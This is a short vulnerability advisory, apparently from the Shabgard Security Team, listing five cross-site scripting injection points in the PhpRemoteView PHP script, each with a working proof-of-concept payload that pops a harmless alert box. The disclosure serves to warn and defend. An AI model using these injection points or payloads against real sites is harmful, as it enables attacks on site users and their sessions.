---------------------------------------------
 PhpRemoteView Multiple Xss Vulnerabilities
---------------------------------------------
 
 Site:
   
  http://php.spb.ru/remview/ 

 Bug:
 
  1- http://victim/path/PRV.php?&c=v&d=[path]&f="><script>alert(/Soot/)</script>

  2- http://victim/path/PRV.php?c=l&d="><script>alert(/Soot/)</script>

  3-
http://victim/path/PRV.php?c=setup&ref="><script>alert(/Soot/)</script>

  4-http://victim/path/PRV.php?c=d&d=[path]
    MAKE DIR (type full path) : "><script>alert(/Soot/)</script>

  5-http://victim/path/PRV.php?c=d&d=[path]
    Full file name : "><script>alert(/Soot/)</script>

---------------------------------------------
 Source :
  http://soot.shabgard.org/bugs/phpremoteview.txt

 Credit :
  Soot 
  Shabgard Security Team
  http://www.shabgard.org 

 Greetz : 
  Hregy,Elite,Bl2k,Littlehacker
---------------------------------------------